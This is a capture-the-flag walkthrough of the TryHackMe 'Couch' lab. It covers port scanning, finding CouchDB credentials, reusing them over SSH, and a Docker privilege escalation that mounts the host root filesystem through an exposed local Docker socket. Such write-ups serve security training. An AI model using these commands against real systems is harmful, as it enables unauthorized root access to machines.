TryHackMe: Couch by stuxnet

Scan the machine. How many ports are open?

Ok, first thing is first let's add to our /etc/hosts and run rustscan to see what we have....

╰─⠠⠵ rustscan -a couch --ulimit 10000 -- -sC -sV -oA couch -v
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Nmap? More like slowmap.🐢

[~] The config file is expected to be at "/home/tj/.rustscan.toml"
[~] Automatically increasing ulimit value to 10000.
Open 10.10.92.201:22
Open 10.10.92.201:5984
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

[~] Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-09 20:37 BST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:37
Completed NSE at 20:37, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:37
Completed NSE at 20:37, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:37
Completed NSE at 20:37, 0.00s elapsed
Initiating Ping Scan at 20:37
Scanning 10.10.92.201 [2 ports]
Completed Ping Scan at 20:37, 0.03s elapsed (1 total hosts)
Initiating Connect Scan at 20:37
Scanning couch (10.10.92.201) [2 ports]
Discovered open port 22/tcp on 10.10.92.201
Discovered open port 5984/tcp on 10.10.92.201
Completed Connect Scan at 20:37, 0.03s elapsed (2 total ports)
Initiating Service scan at 20:37
Scanning 2 services on couch (10.10.92.201)
Completed Service scan at 20:37, 11.15s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.92.201.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:37
Completed NSE at 20:37, 1.33s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:37
Completed NSE at 20:37, 0.14s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:37
Completed NSE at 20:37, 0.00s elapsed
Nmap scan report for couch (10.10.92.201)
Host is up, received conn-refused (0.034s latency).
Scanned at 2021-07-09 20:37:33 BST for 12s

PORT     STATE SERVICE REASON  VERSION
22/tcp   open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 34:9d:39:09:34:30:4b:3d:a7:1e:df:eb:a3:b0:e5:aa (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDMXnGZUnLWqLZb8VQiVH0z85lV+G4KY5l5kKf1fS7YgSnfZ+k3CRjAZPuGceg5RQEUbOMCm+0u4SDyIEbwwAXGv0ORK4/VEIyJlZmtlqeyASwR8ML4yjdGqinqOUZ3jN/ZIg4veJ02nr86GZP+Nto0TZt7beaIxykMEZHTdo0CctdKLIet7PpvwG4F5Tn9MBoys9pUjfpcnwbf91Tv6i56Gipo07jKgb5vP8Nl1TXPjWB93WNW2vWEQ1J4tiyZlBeLOaNaEbxvNQFnKxjVYiiLCbcofwSdrwZ7/+sIy5BdiNW+k81rBN3OqaQNZ8urFaiXXf/ukRr/hhjY5a6m0MHn
|   256 a4:2e:ef:3a:84:5d:21:1b:b9:d4:26:13:a5:2d:df:19 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNTR07g3p8MfnQVnv8uqj8GGDH6VoSRzwRFflMbEf3WspsYyVipg6vtNQMaq5uNGUXF8ubpsnHeJA+T3RilTLXc=
|   256 e1:6d:4d:fd:c8:00:8e:86:c2:13:2d:c7:ad:85:13:9c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKLUyz2Tpwc5qPuFxV+HnGBeqLC6NWrmpmGmE0hk7Hlj
5984/tcp open  http    syn-ack CouchDB httpd 1.6.1 (Erlang OTP/18)
|_http-favicon: Unknown favicon MD5: 2AB2AAE806E8393B70970B2EAACE82E0
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: CouchDB/1.6.1 (Erlang OTP/18)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:37
Completed NSE at 20:37, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:37
Completed NSE at 20:37, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:37
Completed NSE at 20:37, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.17 seconds

Answer: 2

What is the database management system installed on the server?

From our nmap scan we can see that the service on 5984/tcp is couchdb

5984/tcp open  http    syn-ack CouchDB httpd 1.6.1 (Erlang OTP/18)

Answer: CouchDB

What port is the database management system running on?

Again from our scan we can see the port

Answer: 5984

What is the version of the management system installed on the server?

Again from our scan we can see the version

Answer: 1.6.1

What is the path for the web administration tool for this database ## management system?

Some insert search engine verb here reveals the URL to use

Answer: _utils

What is the path to list all databases in the web browser of the database management system?

Answer: _all_dbs

What are the credentials found in the web administration tool?

Looking at the secrets database we see a entry for the username password

Answer: ***********:***********

Compromise the machine and locate user.txt

Attempting to log in via ssh we see the above credentials have been reused .... From here we can cat the flag file user.txt

atena@ubuntu:~$ cat user.txt 
THM{***********}

Answer: THM{***********}

Escalate privileges and obtain root.txt

Let's see if we can own the box, first up is sudo -l

atena@ubuntu:~$ sudo -l
[sudo] password for atena: 
Sorry, user atena may not run sudo on ubuntu.

No.... let's see what groups we are in

atena@ubuntu:~$ id
uid=1000(atena) gid=1000(atena) groups=1000(atena),4(adm),24(cdrom),30(dip),46(plugdev),114(lpadmin),115(sambashare)

OK adm might help, but in the meantime let's copy over linpeas.sh and see if we spot anything interesting.....

╔══════════╣ Useful software                                                                                                 
/usr/bin/docker  

╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports                                                     
tcp        0      0 0.0.0.0:5984            0.0.0.0:*               LISTEN      -                                            
tcp        0      0 127.0.0.1:2375          0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:32986         0.0.0.0:*               LISTEN      -               
tcp6       0      0 :::22                   :::*   

-rwsr-xr-x 1 root root       134K Jan 31  2020 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable

/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep



Digging around the output I can not see much, I end up looking at the .bash_histroy file and find a docker command.

  166  docker -H 127.0.0.1:2375 run --rm -it --privileged --net=host -v /:/mnt alpine

Using this we can connect to a container running on our target with the host filesystem mounted under /mnt. As we we are root in the container we can access /mnt/root and get our flag.

atena@ubuntu:~$ docker -H 127.0.0.1:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
/ # ls /mnt/
bin/            home/           lib64/          opt/            sbin/           usr/
boot/           initrd.img      lost+found/     proc/           srv/            var/
dev/            initrd.img.old  media/          root/           sys/            vmlinuz
etc/            lib/            mnt/            run/            tmp/            vmlinuz.old
/ # cat /mnt/root/root.txt 
THM{***********}

Answer: THM{***********}